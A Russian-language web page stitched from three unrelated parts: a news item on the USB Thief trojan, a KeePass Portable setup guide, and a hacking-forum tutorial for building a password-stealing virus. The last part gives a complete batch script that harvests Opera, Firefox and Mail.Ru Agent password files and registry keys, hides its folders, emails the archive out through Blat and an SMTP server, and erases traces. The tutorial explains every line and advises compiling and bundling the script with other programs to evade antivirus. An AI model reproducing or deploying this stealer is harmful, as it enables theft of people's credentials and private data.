Простейшая флешка-граббер. Троян USB Thief не оставляет следов и работает на флешках Кража паролей и файлов используя usb флешку

Крайне необычный троян: малварь получила название USB Thief (Win32/PSW.Stealer.NAI). Вредонос ориентирован на кражу данных, он распространяется и работает на обыкновенных флешках, а также искусно скрывает следы своего присутствия в системе. Троян идеален для кибершпионажа, так как способен добраться даже до изолированных от сети систем, если к ним можно подключить USB-накопитель.

В отличие от других USB-угроз, которые прописываются в автозагрузку и подделывают ярлыки приложений, чтобы малварь запустилась, USB Thief действует иначе. Работа трояна рассчитана на то, что пользователи часто хранят на флешках портативные версии таких приложений как Firefox, NotePad++, TrueCrypt и так далее. Малварь аккуратно встраивается в цепочку загрузки таких программ, выдавая себя за плагин или файл DLL. Таким образом, когда пользователь запускает с флешки привычное приложение, вместе с ним (в фоновом режиме) выполняется и запуск трояна.

Неизвестный автор малвари озаботился серьезной защитой для своей разработки. USB Thief привязывается к каждой зараженной флешке, используя для этого ее уникальный ID и параметры накопителя. Часть файлов трояна защищена шифрованием AES128, причем ключ генерируется именно на основе уникальных параметров устройства. Также имена файлов малвари разнятся в каждом случае: они генерируются на базе содержимого флешки и времени создания файлов. При попытке скопировать USB Thief на другую флешку или обычный жесткий диск, эта двухступенчатая система защиты не даст малвари заработать, а также серьезно осложнит проведение реверс инжиниринга.

Структура трояна

USB Thief работает напрямую с флешки и не оставляет никаких следов в самой системе. Троян состоит из шести файлов, четыре из которых являются исполняемыми, а еще два содержат данные конфигурации. Первый лоадер отвечает за запуск трояна вместе с портативной версией какой-либо программы. Он проверяет USB-устройство и убеждается, что может записывать на него украденную информацию и хранить ее здесь. Затем стартует второй лоадер. Он проверяет имена родительских процессов и убеждается, что работает в обычном окружении (и никто не пытается его анализировать). Третий лоадер, в свою очередь, проверяет наличие в системе антивирусов.

Последний, четвертый пейлоад, который встраивается в запущенный процесс, отвечает непосредственно за кражу данных. USB Thief похищает документы, изображения, список файлов со всех доступных дисков, данные реестра Windows и информацию, собранную при помощи WinAudit. Все похищенные данные сохраняются на флешке и шифруются с применением эллиптической криптографии .

Эксперты ESET отмечают, что атаки с использованием USB Thief пока нельзя назвать распространенной практикой. Тем не менее, троян очень опасен, так как обнаружить его присутствие сложно, а после извлечения USB-накопителя, никаких следов хищения информации не остается вовсе. Также в отчете компании говорится о том, что автор малвари, при желании, может «перепрофилировать» свой вредонос, заменив пейлоад для кражи данных на любую другую малварь.

Многие компании, в том числе Sony и Adobe, уже становились жертвами хакеров, укравших миллионы паролей и других пользовательских данных. Анализ этой информации показал, что многие пользователи часто применяют либо ненадежные пароли вроде «123456», либо один и тот же пароль для многих сервисов. Это чрезвычайно облегчает хакерам их задачу, и в то же время такую беспечность можно понять: кто в состоянии запомнить больше десятка сложных паролей?

Простым решением может стать листок бумаги, приклеенный под клавиатурой. Ни один хакер не сможет на него покуситься, зато вам придется постоянно следить за людьми, находящимися вблизи вашего компьютера. И от этого листка нет никакой пользы, если вы хотите войти в свой аккаунт с чужого компьютера.

Бесплатный инструмент KeePass 2 Portable решает эту дилемму. Для его работы вам понадобится только USB-флеш-накопитель с 10 Мбайт свободного пространства, на которое вы установите вспомогательную программу. В дальнейшем вам нужно будет помнить только один пароль - от защищенной области флеш-накопителя. Ведь в ней KeePass сохраняет данные для входа в ваши веб-сервисы в виде закодированного банка данных, защищенного основным паролем.

Трояны, уводящие пароли, ничего не смогут разнюхать. И поскольку вам больше не нужно держать в памяти десятки паролей, вы сможете использовать для каждого веб-сервиса новый, действительно надежный пароль. Сейчас мы подробно расскажем, как пользоваться KeePass.

Как это сделать

1 Установите сейф для паролей

Установите сейф для паролей

Вставьте USB-флешку в ПК, создайте на ней новую папку и скопируйте туда содержимое архива с программной KeePass . Запустите программу KeePass.exe. После запуска активируйте автоматический поиск обновлений, нажав во всплывающем окне на «Enable». Затем выберите «View | Change Language» и нажмите «Get more languages».

Загрузите русский языковой файл с открывшегося сайта кликом по «Russian | 2.25+». Распакуйте содержимое архива на USB-накопитель. Вновь нажмите на «View | Change Language», выберите «Russian» и перезапустите KeePass нажатием кнопки «Yes».

2 Создайте новую базу паролей

Создайте новую базу паролей

Выберите «Файл | Новый» и укажите в качестве хранилища паролей USB-накопитель. В следующем окне программа предложит вам задать основной пароль. Его нужно будет вводить при каждом запуске KeePass.

3 Активируйте защищенный режим

Активируйте защищенный режим

Чтобы троян не смог считать ваш пароль для KeePass, следует использовать для его ввода защищенный режим работы программы, подобный UAC в Windows 7. Для этого в KeePass перейдите в «Сервис | Настройки | Безопасность», переместитесь в самый низ окна и поставьте флажок напротив «Вводить основной пароль в защищенном режиме».

4 Наполните БД паролями

Наполните БД паролями

KeePass может сортировать пароли по группам. По умолчанию в вашем новом банке паролей есть такие группы, как «ОС» или «Интернет». Чтобы создать новую запись, выберите подходящую группу (или создайте новую), щелкните на белой области справа правой кнопкой мыши и далее - по «Добавить запись».

Заполните все поля и нажмите «ОК». Поскольку вам больше не нужно помнить пароли для входа в каждый аккаунт, вы можете задать новые, более сложные, которые можно сгенерировать, например, на сайте passwort-generator.com.

5 Используйте автоматическую авторизацию

Если вы хотите войти на сервис с помощью KeePass, откройте группу, в которой хранится соответствующий пароль. Правой кнопкой мыши щелкните по соответствующей записи в хранилище паролей KeePass и в раскрывшемся списке выберите «Начать автонабор». После этого программа передаст ваши данные браузеру, а браузер откроет новое окно, где вы и войдете в свой аккаунт.

Обратите внимание, что в поле «URL» необходимо вводить тот URL, который вы обычно вводите в браузере для авторизации, иначе автоматический ввод пароля через KeePass работать не будет.

6 Расширьте возможности KeePass

Расширьте возможности KeePass

Если хотите расширить функциональность KeePass, зайдите в «Сервис | Модули | Еще модули», после чего вы будете перенаправлены на сайт с полезными расширениями (наши рекомендации вы найдете в таблице выше). Теперь кликом по названию плагина загрузите его и распакуйте на флеш-накопитель.

Запустите KeePass заново и перейдите к «Сервис | Модули». Внизу отобразится список доступных плагинов (некоторые из них можно настраивать).

Лучшие расширения для KeePass

Снабдите ваш сейф с паролями дополнительными функциями, например функцией резервного копирования или передачи пароля для мобильных телефонов.

Имя	Описание
DataBaseBackup	Устанавливает защиту банка паролей на случай, если USB-накопитель будет украден или потерян.
Twofish Cipher
KeeAgent	Добавляет алгоритм кодирования, который почти невозможно взломать; учтите, что из-за этого KeePass будет работать медленнее.
KeyExchanger	Добавляет алгоритм кодирования, который почти невозможно взломать; учтите, что из-за этого KeePass будет работать медленнее.
KeeForm	Открывает ваши любимые сайты нажатием кнопки и автоматически вносит ваши регистрационные данные.

В этой статье опишу как можно быстро и без особого труда,написать и сделать вирус ворующий файлы с паролями и отправляющий всё это на почтовый ящик.
Начнём с того что вирус будет написан на bat"e(CMD,основные команды Вы можете взять ) то есть в обычном текстовом файле и будет выполняться при помощи стандартного,встроенного интреператора Windows- "командной строки".
Для того чтоб написать подобный вирус,нужно знать точное место хранения тех файлов которые и будет он воровать, компоненты Blat которые можно скачать с офф сайта http://www.blat.net/ или же с нашего сервера,так же компонент от архиватора WinRaR Rar.exe(можно обойтись и без него).
Открываем блокнот и копируем туда следующий код:
@echo off md %systemroot%\wincs md %SystemDrive%\pass\ md %SystemDrive%\pass\opera\ md %SystemDrive%\pass\Mozilla\ md %SystemDrive%\pass\MailAgent\ md %SystemDrive%\pass\MailAgent\reg attrib %systemroot%\wincs +h +s +r attrib %SystemDrive%\pass +h +s +r copy /y "%systemroot%\blat.exe" "%systemroot%\wincs\blat.exe" copy /y "%systemroot%\blat.dll" "%systemroot%\wincs\blat.dll" copy /y "%systemroot%\blat.lib" "%systemroot%\wincs\blat.lib" CD /D %APPDATA%\Opera\Opera\ copy /y wand.dat %SystemDrive%\pass\opera\wand.dat copy /y cookies4.dat %SystemDrive%\pass\opera\cookies4.da regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins2 regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent_3.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins3 CD /D %APPDATA% Xcopy Mra\Base %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y /E >nul Xcopy Mra\Update\ver.txt %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y >nul cd %AppData%\Mozilla\Firefox\Profiles\*.default\ copy /y cookies.sqlite %SystemDrive%\pass\Mozilla\cookies.sqlite copy /y key3.db %SystemDrive%\pass\Mozilla\key3.db copy /y signons.sqlite %SystemDrive%\pass\Mozilla\signons.sqlite copy /y %Windir%\Rar.exe %SystemDrive%\pass\Rar.exe >nul del /s /q %SystemRoot%\Rar.exe %SystemDrive%\pass\rar.exe a -r %SystemDrive%\pass\pass.rar %SystemDrive%\pass\ copy /y %SystemDrive%\pass\pass.rar %systemroot%\wincs\pass.rar cd %systemroot%\wincs %systemroot%\wincs\blat.exe -install -server smtp.yandex.ru -port 587 -f логин@yandex.ru -u логин -pw Пароль ren *.rar pass.rar %systemroot%\wincs\blat.exe -body FilesPassword -to логин@yandex.ru -attach %systemroot%\wincs\pass.rar rmdir /s /q %SystemDrive%\pass rmdir /s /q %systemroot%\wincs del /s /q %systemroot%\blat.exe del /s /q %systemroot%\blat.dll del /s /q %systemroot%\blat.lib attrib +a +s +h +r %systemroot%\wind.exe EXIT cls
Не много распишу код самого батинка.
@echo off - скрывает тело батинка(так то она и не нужна,ну всё же)
md %systemroot%\wincs - создаёт папку wincs в системной папке Windows не зависимо от того на каком диске она установлена или как она названа.
md %SystemDrive%\pass\ - создаёт папку pass на диске куда установлена система Windows.
md %SystemDrive%\pass\opera\ - создаёт папку opera куда в дальнейшем будет копироваться wand.dat и cookies4.dat от браузера Opera (до 11* версий опера хранит свои пароли в файле wand.dat )
md %SystemDrive%\pass\Mozilla\ - создаёт папку Mozilla куда в дальнейшем будут копироваться файлы от браузера Mozilla (cookies.sqlite ,key3.db ,signons.sqlite ) в которых храняться пароли.
md %SystemDrive%\pass\MailAgent\ - создаёт папку MailAgent в которую будут копироваться файлы содержащие в себе историю переписки и ключи реестра(хранящие в себе пароли) от Маил Агента.
md %SystemDrive%\pass\MailAgent\reg - создаёт папку reg
attrib %systemroot%\wincs +h +s +r - ставит атрибуты на папку wincs тем самым скрывая её от глаз.
attrib %SystemDrive%\pass +h +s +r - тоже самое что и выше.
copy /y "%systemroot%\blat.exe" "%systemroot%\wincs\blat.exe" - копирует файл blat.exe с места выгрузки в папку wincs
copy /y "%systemroot%\blat.dll" "%systemroot%\wincs\blat.dll" - копирует файл blat.dll с места выгрузки в папку wincs
copy /y "%systemroot%\blat.lib" "%systemroot%\wincs\blat.lib" - копирует файл blat.lib с места выгрузки в папку wincs
CD /D %APPDATA%\Opera\Opera\ - переходит в папку оперы где располагаются файлы с паролями (и не только) от оперы.
copy /y wand.dat %SystemDrive%\pass\opera\wand.dat - копирует файл wand.dat в папку opera
copy /y cookies4.dat %SystemDrive%\pass\opera\cookies4.dat - копирует файл cookies4.dat в папку opera
regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins2 - экспортирует ключ реестра magent_logins2 где хранится пароль, в папку reg
regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins3 - экспортирует ключ реестра magent_logins3 где хранится пароль, в папку reg
CD /D %APPDATA% - переходим в папку AppData
Xcopy Mra\Base %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y /E >nul - копирует содержимое папки Mra\Base в папку MailAgent
Xcopy Mra\Update\ver.txt %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y >nul - копирует файл ver.txt в папку MailAgent
cd %AppData%\Mozilla\Firefox\Profiles\*.default\ - переходим в папку с профилем браузера Мозилы
copy /y cookies.sqlite %SystemDrive%\pass\Mozilla\cookies.sqlite - копирует файл cookies.sqlite в папку Mozilla
copy /y key3.db %SystemDrive%\pass\Mozilla\key3.db - копирует файл key3.db в папку Mozilla
copy /y signons.sqlite %SystemDrive%\pass\Mozilla\signons.sqlite - копирует файл signons.sqlite в папку Mozilla
copy /y %Windir%\Rar.exe %SystemDrive%\pass\Rar.exe >nul - копирует компонент архиватора WinRar Rar.exe в папку pass
del /s /q %SystemRoot%\Rar.exe - удаляет компонент архиватора из папки Windows
%SystemDrive%\pass\rar.exe a -r %SystemDrive%\pass\pass.rar %SystemDrive%\pass\ - архивируем содержимое папки pass
copy /y %SystemDrive%\pass\pass.rar %systemroot%\wincs\pass.rar копируем созданный архив в папку wincs
cd %systemroot%\wincs - переходим в папку wincs
%systemroot%\wincs\blat.exe -install -server smtp.yandex.ru -port 587 -f логин@yandex.ru -u логин -pw Пароль - готовит программу Blat к отправки архив указывая данные для авторизации и отправки письма.Не забудьте указать свои данные от почтового ящика,от куда будет отправляться письмо с архивом.
ren *.rar pass.rar - на всякий случай если архив в ходе не принял не правильное имя,мы его ещё раз переименуем в pass.rar
%systemroot%\wincs\blat.exe -body Files Password -to логин@yandex.ru -attach %systemroot%\wincs\pass.rar - указываем на какой почтовый адрес будет послано письмо и отсылаем его.
rmdir /s /q %SystemDrive%\pass - удаляем папку pass
rmdir /s /q %systemroot%\wincs - удаляем папку wincs
del /s /q %systemroot%\blat.exe
del /s /q %systemroot%\blat.dll - удаляем компоненты Blat из папки Windows.
del /s /q %systemroot%\blat.lib - удаляем компоненты Blat из папки Windows.
attrib +a +s +h +r %systemroot%\wind.exe - ставим на себя атрибуты тем самым скрываем себя от глаз.
EXIT - завершаем процесс батинка и выходим.
cls - очищаем вывод каких либо строк в интреператоре.
Скопировали,сохраняем как wind.bat и компилируем в exe при помощи программы Bat to exe converter ,далее собираем всё в кучу,то есть берём компоненты программы Blat и компонент архиватора WinRar (скачать можно ) и склеиваем в один исполняемый файл,или же с какой нибудь программой, путь выгрузки всех фалов должен быть %SystemRoot% или %WindowsDir% или %windir% .
В итоге мы получаем вирус который не будет палиться антивирусами и будет отправлять архив с файлами к Вам на почту.Файлы которые придут на почту,можно расшифровать с помощью multi-password-recovery ,правда не все,а только wand.dat от оперы и то если её не обновляли до 11*версий.Все остальные файлы можно расшифровать заменив на свои.
На этом я думаю можно закончить,если же у Вас возникнут какие либо вопросы,не стесняйтесь задавайте.
Спасибо за внимание,всего доброго!
©SwAp TheHackWorld.in